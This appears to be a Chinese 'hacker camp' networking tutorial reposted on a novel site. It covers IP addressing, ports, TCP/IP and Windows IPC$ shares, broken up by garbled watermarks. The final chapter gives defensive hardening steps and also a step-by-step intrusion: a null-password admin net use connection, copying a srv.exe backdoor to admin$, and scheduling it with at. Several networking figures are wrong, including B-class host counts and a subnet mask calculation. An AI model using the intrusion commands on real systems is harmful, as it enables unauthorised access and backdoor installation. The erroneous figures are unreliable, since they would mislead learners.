双合成月饼礼盒价钱:电脑技巧

第一卷 第二章 字数:1526
  ?????财
  黑客营教学（网络的基本知识）
  QUOTE:
  IP地址与子网掩码
  1、IP地址：
  Internet网是由不同物理网络互连而成，不同网络之间实现计算机的相互通信必须有相应的地址标识，这个地址标识称为IP地址。IP地址提供统一的地址格式即由32Bit位组成，由于二进制使用起来不方便，用户使用“点分十进制”方式表示。IP地址唯一的标识出主机所在的网络和网络中位置的编号，按照网络规模的大小，常用IP地址分为以下三类：
  A：这类地址的特点是以0开头，第一字节表示网络号，第二、三、四字节表示网络中的主机号，网络数量少，最多可以表示126个网络号，每一网络中最多可以有16777214个主机号。
  0*******************************
  l—1260—2550—2551—254
  B：这类地址的特点是以l0开头，第一、二字节表示网络号，第二、三字节表示网络中的主机号，最多可以表示16384个网络号，每一网络中最多可以有66534个主机号。
  10******************************
  128一1910—2550—2551—254
  C：这类地址的特点是以110开头，第一、二、三字节表示网络号，第四字节表示网络中的主机号，网络数量比较多，可以有2097152个网络号，每一网络中最多可以有254个主机号。
  110*****************************
  192—2330—2550—2551—254
  IP地址规定：
  网络号不能以127开头，第一字节不能全为0，也不能全为l。
  主机号不能全为0，也不能全为l。
  2、为了快速确定IP地址的哪部分代表网络号，哪部分代表主机号，判断两个IP地址是否属于同一网络,就产生的子网掩码的概念，子网掩码按IP地址的格式给出。A、B、C类IP地址的默认子网掩码如下：
  A：255．0．0．0
  B：255．255．0．0
  C：255．255.255．0
  用子网掩码判断IP地址的网络号与主机号的方法是用IP地址与相应的子网掩码进行与运算，可以区分出网络号部分和主机号部分。
  如10.68.89.1是A类IP地址，所以默认子网掩码为255．0．0，0，分别转化为二进制进行与运算后，得出网络号为10。再如202．30．152.3和202．30．152．80为C类IP地址，默认子网掩码为255．255．255．0，进行与运算后得出二者网络号相同，说明两主机位于同一网络。
  子网掩码的另一功能是用来划分子网。在实际应用中，经常遇到网络号不够的问题，需要把某类网络划分出多个子网，采用的方法就是将主机号标识部分的一些二进制位划分出来用来标识子网。
  3、网关地址：在Internet网中，网关是一种连接内部网与Internet上其它网的中间设备，也称“路由器”。网关地址是可以理解为内部网与Internet网信息传输的通道地址。
幽u书擝 uUtxｔ。cＯM 全纹字版阅牍

第一卷 第三章 字数:2315
  ?????祝
  QUOTE:
  端口的概念，端口的分类
  端口概念
  在网络技术中，端口（Port）大致有两种意思：一是物理意义上的端口，比如，ADSLModem、集线器、交换机、路由器用于连接其他网络设备的接口，如RJ-45端口、SC端口等等。二是逻辑意义上的端口，一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。
  端口分类
  逻辑意义上的端口有多种分类标准，下面将介绍两种常见的分类：
  1.按端口号分布划分
  （1）知名端口（Well-KnownPorts）
  知名端口即众所周知的端口号，范围从0到1023，这些端口号一般固定分配给一些服务。比如21端口分配给FTP服务，25端口分配给SMTP（简单邮件传输协议）服务，80端口分配给HTTP服务，135端口分配给RPC（远程过程调用）服务等等。
  （2）动态端口（DynamicPorts）
  动态端口的范围从1024到65535，这些端口号一般不固定分配给某个服务，也就是说许多服务都可以使用这些端口。只要运行的程序向系统提出访问网络的申请，那么系统就可以从这些端口号中分配一个供该程序使用。比如1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后，就会释放所占用的端口号。
  不过，动态端口也常常被病毒木马程序所利用，如冰河默认连接端口是7626、WAY2.4是8011、Netspy3.0是7306、YAI病毒是1024等等。
  2.按协议类型划分
  按协议类型划分，可以分为TCP、UDP、IP和ICMP（Internet控制消息协议）等端口。下面主要介绍TCP和UDP端口：
  （1）TCP端口
  TCP端口，即传输控制协议端口，需要在客户端和服务器之间建立连接，这样可以提供可靠的数据传输。常见的包括FTP服务的21端口，Telnet服务的23端口，SMTP服务的25端口，以及HTTP服务的80端口等等。
  （2）UDP端口
  UDP端口，即用户数据包协议端口，无需在客户端和服务器之间建立连接，安全性得不到保障。常见的有DNS服务的53端口，SNMP（简单网络管理协议）服务的161端口，QQ使用的8000和4000端口等等。
  查看端口
  在Windows2000/XP/Server2003中要查看端口，可以使用Netstat命令：
  依次点击“开始→运行”，键入“cmd”并回车，打开命令提示符窗口。在命令提示符状态下键入“netstat-a-n”，按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态（如图）。
  小知识：Netstat命令用法
  命令格式：Netstat－a－e－n－o－s
  －a表示显示所有活动的TCP连接以及计算机监听的TCP和UDP端口。
  －e表示显示以太网发送和接收的字节数、数据包数等。
  －n表示只以数字形式显示所有活动的TCP连接的地址和端口号。
  －o表示显示活动的TCP连接并包括每个连接的进程ID（PID）。
  －s表示按协议显示各种连接的统计信息，包括端口号。
  关闭/开启端口
  在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。
  关闭端口
  比如在Windows2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。接着在打开的服务窗口中找到并双击“SimpleMailTransferProtocol（SMTP）”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。
  开启端口
  如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，单击“确定”按钮即可。
  提示：在Windows98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。
优ｕ书擝 uＵTXＴ。ＣＯＭ 诠蚊自版阅读

第一卷 第四章 字数:4435
  ??????
  QUOTE:
  TCP/IP协议体系结构简介
  1、TCP/IP协议栈
  四层模型
  TCP/IP这个协议遵守一个四层的模型概念：应用层、传输层、互联层和网络接口层。
  网络接口层
  模型的基层是网络接口层。负责数据帧的发送和接收，帧是独立的网络信息传输单元。网络接口层将帧放在网上，或从网上把帧取下来。
  互联层
  互联协议将数据包封装成internet数据报，并运行必要的路由算法。
  这里有四个互联协议：
  网际协议IP：负责在主机和网络之间寻址和路由数据包。
  地址解析协议ARP：获得同一物理网络中的硬件主机地址。
  网际控制消息协议ICMP：发送消息，并报告有关数据包的传送错误。
  互联组管理协议IGMP：被IP主机拿来向本地多路广播路由器报告主机组成员。
  传输层
  传输协议在计算机之间提供通信会话。传输协议的选择根据数据传输方式而定。
  两个传输协议：
  传输控制协议TCP：为应用程序提供可靠的通信连接。适合于一次传输大批数据的情况。并适用于要求得到响应的应用程序。
  用户数据报协议UDP：提供了无连接通信，且不对传送包进行可靠的保证。适合于一次传输小量数据，可靠性则由应用层来负责。
  应用层
  应用程序通过这一层访问网络。
  网络接口技术
  IP使用网络设备接口规范NDIS向网络接口层提交帧。IP支持广域网和本地网接口技术。
  串行线路协议
  TCP/IPG一般通过internet串行线路协议SLIP或点对点协议PPP在串行线上进行数据传送。(是不是我们平时把它称之为异步通信，对于要拿LINUX提供建立远程连接的朋友应该多研究一下这方面的知识)?
  2、ARP
  要在网络上通信，主机就必须知道对方主机的硬件地址(我们不是老遇到网卡的物理地址嘛)。地址解析就是将主机IP地址映射为硬件地址的过程。地址解析协议ARP用于获得在同一物理网络中的主机的硬件地址。
  解释本地IP地址(要了解地址解析工作过程的朋友看好了)
  主机IP地址解析为硬件地址：
  (1)当一台主机要与别的主机通信时，初始化ARP请求。当该IP断定IP地址是本地时，源主机在ARP缓存中查找目标主机的硬件地址。
  (2)要是找不到映射的话，ARP建立一个请求，源主机IP地址和硬件地址会被包括在请求中，该请求通过广播，使所有本地主机均能接收并处理。
  (3)本地网上的每个主机都收到广播并寻找相符的IP地址。
  (4)当目标主机断定请求中的IP地址与自己的相符时，直接发送一个ARP答复，将自己的硬件地址传给源主机。以源主机的IP地址和硬件地址更新它的ARP缓存。源主机收到回答后便建立起了通信。
  解析远程IP地址
  不同网络中的主机互相通信，ARP广播的是源主机的缺省网关。
  目标IP地址是一个远程网络主机的话，ARP将广播一个路由器的地址。
  (1)通信请求初始化时，得知目标IP地址为远程地址。源主机在本地路由表中查找，若无，源主机认为是缺省网关的IP地址。在ARP缓存中查找符合该网关记录的IP地址(硬件地址)。
  (2)若没找到该网关的记录，ARP将广播请求网关地址而不是目标主机的地址。路由器用自己的硬件地址响应源主机的ARP请求。源主机则将数据包送到路由器以传送到目标主机的网络，最终达到目标主机。
  (3)在路由器上，由IP决定目标IP地址是本地还是远程。如果是本地，路由器用ARP(缓存或广播)获得硬件地址。如果是远程，路由器在其路由表中查找该网关，然后运用ARP获得此网关的硬件地址。数据包被直接发送到下一个目标主机。
  (4)目标主机收到请求后，形成ICMP响应。因源主机在远程网上，将在本地路由表中查找源主机网的网关。找到网关后，ARP即获取它的硬件地址。
  (5)如果此网关的硬件地址不在ARP缓存中，通过ARP广播获得。一旦它获得硬件地址，ICMP响应就送到路由器上，然后传到源主机。
  ARP缓存
  为减少广播量，ARP在缓存中保存地址映射以备用。ARP缓存保存有动态项
  和静态项。动态项是自动添加和删除的，静态项则保留在CACHE中直到计算机重新启动。
  ARP缓存总是为本地子网保留硬件广播地址(0xffffffffffffh)作为一个永久项。
  此项使主机能够接受ARP广播。当查看缓存时，该项不会显示。
  每条ARP缓存记录的生命周期为10分钟，2分钟内未用则删除。缓存容量满时，删除最老的记录。
  加入静态(永久)记录通过添加静态ARP项可减少ARP请求访问主机的次数。
  ARP包的结构
  ARP结构的字段如下：
  硬件类型--使用的硬件(网络访问层)类型。
  协议类型--解析过程中的协议使用以太类型的值。
  硬件地址长度--硬件地址的字节长度，对于以太网和令牌环来说，其长度为6字节。
  协议地址长度--协议地址字节的长度，IP的长度是4字节。
  操作号--指定当前执行操作的字段。
  发送者的硬件地址--发送者的硬件地址。
  发送者的协议地址--发送者的协议地址。
  目的站硬件地址--目标者的硬件地址。
  目的站协议地址--目标者的协议地址。
  3、ICMP和IGMP
  internet控制消息协议ICMP是用于报告错误并代表IP对消息进行控制。
  IP运用互联组管理协议IGMP来告诉路由器，某一网络上指导组中的可用主机。
  ICMP
  ICMP源抑制消息：当TCP/IP主机发送数据到另一主机时，如果速度达到路由器或者链路的饱和状态，路由器发出一个ICMP源抑制消息。
  ICMP数据包结构
  类型：一个8位类型字段，表示ICMP数据包类型。
  代码：一个8位代码域，表示指定类型中的一个功能。如果一个类型中只有一种功能，代码域置为0。
  检验和：数据包中ICMP部分上的一个16位检验和。
  指定类型的数据随每个ICMP类型变化的一个附加数据。
  IGMP
  IGMP信息传给别的路由器以使每个支持多路广播的路由器获知哪个主机组和哪个网络中。
  IGMP包结构
  版本：IGMP的版本，值一般为0x1h。
  类型：IGMP消息的类型。0x1h类型称为主机成员请求，在多路广播路由器上用于指定多级组中的任何成员轮询一个网络。0x2h类型称为主机成员报告，在主机上用于发布指定组中的成员情况或对一个路由器的主机成员请求进行回答。
  未用：未用的域名被发送者置零且被接收者忽略。
  检验和：IGMP头的一个16位检验和。
  组地址：主机用该组地址在一个主机成员请求中存储IP多路广播地址。在主机成员请求中，组地址被全置零，而且硬件级的多路广播地址被用来标示主机组。
  4、IP
  IP是一个无连接的协议，主要就是负责在主机间寻址并为数据包设定路由，在交换数据前它并不建立会话。因为它不保证正确传递，另一方面，数据在被收到时，IP不需要收到确认，所以它是不可靠的。有一些字段，在当数据从传输层传下来时，会被附加在数据包中，我们来看一下这些字段：
  源IP地址：用IP地址确定数据报发送者。
  目标IP地址：用IP地址确定数据报目标。
  协议：告知目的机的IP是否将包传给TCP或UDP。
  检查和：一个简单的数学计算，用来证实收到的包的完整性。
  TTL生存有效时间：指定一个数据报被丢弃之前，在网络上能停留多少时间(以秒计)。它避免了包在网络中无休止循环。路由器会根据数据在路由器中驻留的时间来递减TTL。其中数据报通过一次路由器，TTL至少减少一秒。根据我们前面提到关于ARP的知识，如果IP地址目标为本地地址时，IP将数据包直接传给那个主机；如果目标地址为远程地址的话，IP在本地的路由表中查找远程主机的路由(看来好象我们平时拨114一样)。如果找到一个路由，IP用它传送数据包。如果没找到呢，就会将数据包发送到源主机的缺省网关，也称之为路由器。(很多时候一直在搞网关和路由器的定义，其实我觉得在学的时候不一定死抠概念，现在硬件和软件结合的产品越来越多了，一时很分清的，只要我们运用的时候可以解决实际问题嘛。)这样当路由器收到一个包后，该包向上传给IP：
  (1)如果交通阻塞(听起来蛮可怕的)，包在路由器中停滞，TTL至少减1或更多。要是它降到0的话，包就会被抛弃。
  (2)如果对于下一网络来说包太大的话，IP会将它分割成若干个小包。
  (3)如果包被分解，IP为每个新包制造一个新头，其中包括：一个标志，用来显示其它小包在其后；一个小包ID，用来确定所有小包是一起的；一个小包偏移，用来告诉接收主机怎么重新组合它们。
  (4)IP计算一个新的检验和。
  (5)IP获取一个路由的目标硬件地址。
  (6)IP转发包。
  在下一主机，包被发送到TCP或UDP。每个路由器都要重复该过程。直到包到达最终目的地。当包到达最终目的地后，IP将小包组装成原来的包。
  5、TCP
  TCP是一种可靠的面向连接的传送服务。它在传送数据时是分段进行的，主机交换数据必须建立一个会话。它用比特流通信，即数据被作为无结构的字节流。通过每个TCP传输的字段指定顺序号，以获得可靠性。如果一个分段被分解成几个小段,接收主机会知道是否所有小段都已收到。通过发送应答，用以确认别的主机收到了数据。对于发送的每一个小段，接收主机必须在一个指定的时间返回一个确认。如果发送者未收到确认，数据会被重新发送；如果收到的数据包损坏，接收主机会舍弃它，因为确认未被发送，发送者会重新发送分段。
優u書盟 ｕuＴＸT．Ｃｏｍ 全汶字扳阅镀

第一卷 第五章 字数:4768
  ??????
  端口
  SOCKETS实用程序使用一个协议端口号来标明自己应用的唯一性。端口可以使用0到65536之间的任何数字。在服务请求时，操作系统动态地为客户端的应用程序分配端口号。
  套接字
  套接字在要领上与文件句柄类似，因为其功能是作为网络通信的终结点。一个应用程序通过定义三部分来产生一个套接字：主机IP地址、服务类型(面向连接的服务是TCP，无连接服务是UDP)、应用程序所用的端口。
  TCP端口
  TCP端口为信息的传送提供定地点，端口号小于256的定义为常用端口。
  TCP的三次握手
  TCP对话通过三次握手来初始化。三次握手的目的是使数据段的发送和接收同步；告诉其它主机其一次可接收的数据量，并建立虚连接。我们来看看这三次握手的简单过程：
  (1)初始化主机通过一个同步标志置位的数据段发出会话请求。
  (2)接收主机通过发回具有以下项目的数据段表示回复：同步标志置位、即将发送的数据段的起始字节的顺序号、应答并带有将收到的下一个数据段的字节顺序号。
  (3)请求主机再回送一个数据段，并带有确认顺序号和确认号。
  TCP滑动窗口
  TCP滑动窗口用来暂存两台主机间要传送的数据，有点类似CACHE。每个TCP/IP主机有两个滑动窗口：一个用于接收数据，另一个用于发送数据。
  6、UDP
  用户数据报协议UDP提供了无连接的数据报服务。它适用于无须应答并且通常一次只传送少量数据的应用软件。
  UDP端口
  端口作为多路复用的消息队列使用。
  15NETSTAT网络状态
  53DOMAIN域名服务器
  69TFTP平凡文件传送协议
  137NETBIOS-NSNETBIOS命令服务
  138NETBIOS-DGMNETBIOS数据报服务
  161SNMPSNMP网络监视器
  IP地址分配
  1、IP地址
  IP地址标识着网络中一个系统的位置。我们知道每个IP地址都是由两部分组成的：网络号和主机号。其中网络号标识一个物理的网络，同一个网络上所有主机需要同一个网络号，该号在互联网中是唯一的；而主机号确定网络中的一个工作端、服务器、路由器其它TCP/IP主机。对于同一个网络号来说，主机号是唯一的。每个TCP/IP主机由一个逻辑IP地址确定。
  网络号和主机号
  IP地址有两种表示形式：二进制表示(1和0太多了就搞不清)和点分十进制表示。每个IP地址的长度为4字节，由四个8位域组成，我们通常称之为八位体。八位体由句点.分开，表示为一个0-255之间的十进制数。一个IP地址的4个域分别标明了网络号和主机号。
  2、地址类型
  为适应不同大小的网络，internet定义了5种IP地址类型。
  可以通过IP地址的前八位来确定地址的类型：
  类型IP形式网络号主机号
  A类w.x.y.zwx.y.z
  B类w.x.y.zw.xy.z
  C类w.x.y.zw.x.yz
  我们来看一下这5类地址：
  A类地址：可以拥有很大数量的主机，最高位为0，紧跟的7位表示网络号，余24位表示主机号，总共允许有126个网络。
  B类地址：被分配到中等规模和大规模的网络中，最高两位总被置于二进制的10，允许有16384个网络。
  C类地址：被用于局域网。高三位被置为二进制的110，允许大约200万个网络。
  D类地址：被用于多路广播组用户，高四位总被置为1110，余下的位用于标明客户机所属的组。E类地址是一种仅供试验的地址。
  3、地址分配指南
  在分配网络号和主机号时应遵守以下几条准则：
  (1)网络号不能为127。大家知道该标识号被保留作回路及诊断功能，还记得平时ping127.0.0.1？
  (2)不能将网络号和主机号的各位均置1。如果每一位都是1的话，该地址会被解释为网内广播而不是一个主机号。(TCP/IP是一个可广播的协议嘛)
  (3)相应于上面一条，各位均不能置0，否则该地址被解释为“就是本网络”。
  (4)对于本网络来说，主机号应该是唯一。(否则会出现IP地址已分配或有冲突之类的错误)
  分配网络号
  对于每个网络以及广域连接，必须有唯一的网络号，主机号用于区分同一物理网络中的不同主机。如果网络由路由器连接，则每个广域连接都需要唯一的网络号。
  分配主机号
  主机号用于区分同一网络中不同的主机，并且主机号应该是唯一的。所有的主机包括路由器间的接口，都应该有唯一的网络号。路由器的主机号，要配置成工作站的缺省网关地址。
  有效的主机号
  A类：w.0.0.1--w.255.255.254
  B类：w.x.0.1--w.x.255.254
  C类：w.x.y.1--w.x.y.254
  4、子网屏蔽和IP地址
  TCP/IP上的每台主机都需要用一个子网屏蔽号。它是一个4字节的地址，用来封装或“屏蔽”IP地址的一部分，以区分网络号和主机号。当网络还没有划分为子网时，可以使用缺省的子网屏蔽；当网络被划分为若干个子网时，就要使用自定义的子网屏蔽了。
  缺省值
  我们来看看缺省的子网屏蔽值，它用于一个还没有划分子网的网络。即使是在一个单段网络上，每台主机也都需要这样的缺省值。它的形式依赖于网络的地址类型。在它的4个字节里，所有对应网络号的位都被置为1，于是每个八位体的十进制值都是255；所有对就主机号的位都置为0。例如：C类网地址192.168.0.1和相应的缺省屏蔽值255.255.255.0。
  确定数据包的目的地址
  我们说把屏蔽值和IP地址值做“与”的操作其实是一个内部过程，它用来确定一个数据包是传给本地还是远程网络上的主机。其相应的操作过程是这样的：当TCP/IP初始化时，主机的IP地址和子网屏蔽值相“与”。在数据包被发送之前，再把目的地址也和屏蔽值作“与”，这样如果发现源IP地址和目的IP地址相匹配，IP协议就知道数据包属于本地网上的某台主机；否则数据包将被送到路由器上。
  注：我们知道“与”操作是将IP地址中的每一位与子网屏蔽中相应的位按逻辑与作比较。
  建立子网
  1、子网简介
  一个网络实际上可能会有多个物理网段，我们把这些网段称之为子网，其使用的IP地址是由某个网络号派生而得到的。将一个网络划分成若干个子网，需要使用不同的网络号或子网号。当然了，划分子网有它的优点，通过划分子网，每个单位可以将复杂的物理网段连接成一个网络，并且可以：
  (1)混合使用多种技术，比如以太网和令牌环网。(最流行的两种接口都支持了哦)
  (2)克服当前技术的限制，比如突破每段主机的最大数量限制。
  (3)通过重定向传输以及减少广播等传输方式以减轻网络的拥挤。
  实现子网划分
  在动手划分子网之前，我们一定要先分析一下自己的需求以及将来的规划。一般情况下我们遵循这样的准则：
  (1)确定网络中的物理段数量。(就是子网个数嘛)
  (2)确定每个子网需要的主机数。注意一个主机至少一个IP地址。
  (3)基于此需求，定义：整个网络的子网屏蔽、每个子网唯一的子网号和每个子网的主机号范围。
  子网屏蔽位
  在定义一个子网屏蔽之前，确定一下将来需要的子网数量及每子网的主机数是必不可少的一步。因为当更多的位用于子网屏蔽时，就有更多的可用子网了，但每个子网中的主机数将减少。(这和定义IP地址的概念正好相反)
  2、定义子网屏蔽
  将网络划分成若干个子网时，必须要定义好子网屏蔽。我们来看看定义的步骤：
  (1)确定物理网段也就是子网的个数，并将这个数字转换成二进制数。比如B类地址，分6个子网就是110。
  (2)计算物理网段数(子网数)的二进制位数，这里是110，所以需要3位。
  (3)以高位顺序(从左到右)将这个反码转换成相应的十进制值，因为需要3位，就将主机号前3位作为子网号，这里是11100000，所以屏蔽就是255.255.254.0。
  3、定义子网号
  子网号与子网屏蔽的位数相同。
  (1)列出子网号按高到低的顺序使用的位数。例如子网屏蔽使用了3位，二进制值是11100000。
  (2)将最低的一位1转换成十进制，用这个值来定义子网的增量。这个例子中是1110，所以增量是32。
  (3)用这个增量迭加从0开始的子网号，直到下一个值为256。这个例子中就是w.x.32.1-w.x.63.254、w.x.64.1-w.x.127.254等。
  4、定义子网中的主机号
  从上面的例子看出，一旦定义了子网号，就已经确定了每个子网的主机号了。我们在做每次增量后得出的值表明了子网中主机号范围的起始值。
  确定每个子网中的主机数目(1)计算主机号可用的位数。例如在B类网中用3位定义了网络号，那么余下的13位定义了主机号。
  (2)将这个余下的位数也就是主机号转换为十进制，再减去1。例如13位值1111111111111转换为十进制的话就是8191，所以这个网络中每个子网的主机数就是8190了。
  实现IP路由
  1、IP路由简介
  路由就是选择一条数据包传输路径的过程。当TCP/IP主机发送IP数据包时，便出现了路由，且当到达IP路由器还会再次出现。路由器是从一个物理网向另一个物理网发送数据包的装置，路由器通常被称为网关。对于发送的主机和路由器而言，必须决定向哪里转发数据包。在决定路由时，IP层查询位于内存中的路由表。
  (1)当一个主机试图与另一个主机通信时，IP首先决定目的主机是一个本地网还是远程网。
  (2)如果目的主机是远程网，IP将查询路由表来为远程主机或远程网选择一个路由。
  (3)若未找到明确的路由，IP用缺省的网关地址将一个数据传送给另一个路由器。
  (4)在该路由器中，路由表再次为远程主机或网络查询路由，若还未找到路由，该数据包将发送到该路由器的缺省网关地址。每发现一条路由，数据包被转送下一级路由器，称为一次“跳步”，并最终发送至目的主机。若未发现任何一个路由，源主机将收到一个出错信息。
优幽書擝 ｕｕTＸＴ.CＯm 铨蚊子板阅镀

第一卷 第六章 字数:6368
  ??????
  QUOTE:
  IPC$详细介绍
  什么是ipc$
  IPC$(InternetProcessConnection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
  利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
  我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
  所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
  解惑:
  1)IPC连接是WindowsNT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到WindowsNT中的很多DLL函数，所以不能在Windows9.x中运行。
  也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2004年了,建议98的同志换一下系统吧,98不爽的)
  2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
  3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
  建立ipc$连接在hack攻击中的作用
  就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限。
  不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的
  因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
  所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
  ipc$与空连接,139,445端口,默认共享的关系
  以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的。
  1)ipc$与空连接:
  不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
  许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
  2)ipc$与139,445端口:
  ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
  3)ipc$与默认共享
  默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
  ipc$连接失败的原因
  以下5个原因是比较常见的:
  1)你的系统不是NT或以上操作系统;
  2)对方没有打开ipc$默认共享
  3)对方未开启139或445端口(惑被防火墙屏蔽)
  4)你的命令输入有误(比如缺少了空格等)
  5)用户名或密码错误(空连接当然无所谓了)
  另外,你也可以根据返回的错误号分析原因：
  错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；
  错误号51，Windows无法找到网络路径:网络有问题；
  错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
  错误号67，找不到网络名：你的lanmanworkstation服务未启动；目标删除了ipc$；
  错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连。
  错误号1326，未知的用户名或错误密码：原因很明显了；
  错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动。（连接域控会出现此情况）
  错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。
  关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
  如何打开目标的IPC$
  首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令netshareipc$来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。
  如何防范ipc$入侵
  1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
  首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous=DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
  2禁止默认共享
  1）察看本地共享资源
  运行-cmd-输入netshare
  2）删除共享(每次输入一个）
  netshareipc$/delete
  netshareadmin$/delete
  netsharec$/delete
  netshared$/delete（如果有e,f,……可以继续删除）
  3）停止server服务
  netstopserver/y（重新启动后server服务会重新开启）
  4）修改注册表
  运行-regedit
  server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
  pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
  如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。
  3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
  控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用
  4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师
  5设置复杂密码，防止通过ipc$穷举密码
  相关命令
  1)建立空连接:
  netuse\\IP\ipc$""/user:""(一定要注意:这一行命令中包含了3个空格)
  2)建立非空连接:
  netuse\\IP\ipc$"用户名"/user:"密码"(同样有3个空格)
  3)映射默认共享:
  netusez:\\IP\c$"密码"/user:"用户名"(即可将对方的c盘映射为自己的z盘，其他盘类推)
  如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令netusez:\\IP\c$
  4)删除一个ipc$连接
  netuse\\IP\ipc$/del
  5)删除共享映射
  netusec:/del删除映射的c盘，其他盘类推
  netuse*/del删除全部,会有提示要求按y确认
  经典入侵模式
  这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
  1.C:\>netuse\\127.0.0.1\IPC$""/user:"admintitrators"
  这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。
  2.C:\>copysrv.exe\\127.0.0.1\admin$
  先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
  3.C:\>nettime\\127.0.0.1
  查查时间，发现127.0.0.1的当前时间是2002/3/19上午11:00，命令成功完成。
  4.C:\>at\\127.0.0.111:05srv.exe
